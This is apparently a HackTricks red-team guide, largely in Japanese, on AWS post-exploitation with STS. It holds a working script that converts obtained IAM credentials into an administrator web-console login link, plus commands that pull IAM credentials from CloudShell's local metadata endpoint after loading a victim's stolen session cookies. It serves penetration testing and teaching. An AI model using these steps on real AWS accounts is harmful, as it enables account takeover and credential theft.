AWS - STS Post Exploitation

htARTE(HackTricks AWS Red Team Expert) を通じて、ゼロからヒーローまでAWSハッキングを学びましょう

HackTricksをサポートする他の方法:

STS

詳細については:

IAM資格情報からコンソールへ

IAM資格情報を取得できた場合、次のツールを使用してWebコンソールにアクセスすることに興味があるかもしれません。 ユーザー/ロールには、**sts:GetFederationToken**権限が必要であることに注意してください。

カスタムスクリプト

次のスクリプトは、デフォルトのプロファイルとデフォルトのAWSロケーション(govおよびcn以外)を使用して、Webコンソールにログインするために使用できる署名付きURLを提供します:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)



# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

https://github.com/NetSPI/aws_consolerを使用して、ウェブコンソールリンクを生成することができます。

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

IAMユーザーがsts:GetFederationToken権限を持っていることを確認するか、アサインするロールを提供してください。

aws-vault

aws-vaultは、開発環境でAWS資格情報を安全に保存およびアクセスするためのツールです。

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

aws-vaultを使用してブラウザコンソールセッションを取得することもできます

コンソールからIAM資格情報へ

元の投稿で発見された、Webコンソールへのアクセス権を何らかの方法で妥協できた場合(おそらくクッキーを盗んで.awsフォルダにアクセスできなかった場合)、CloudShellを介してそのユーザーのIAMトークン資格情報を取得できます。

CloudShellはIAM資格情報をポート1338の未公開エンドポイントを介して公開します。被害者からのセッションクッキーをブラウザに読み込んだ後、CloudShellに移動し、IAM資格情報を取得するために以下のコマンドを発行できます。

TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"
htARTE(HackTricks AWS Red Team Expert) を通じてゼロからヒーローまでAWSハッキングを学ぶ

HackTricksをサポートする他の方法:

最終更新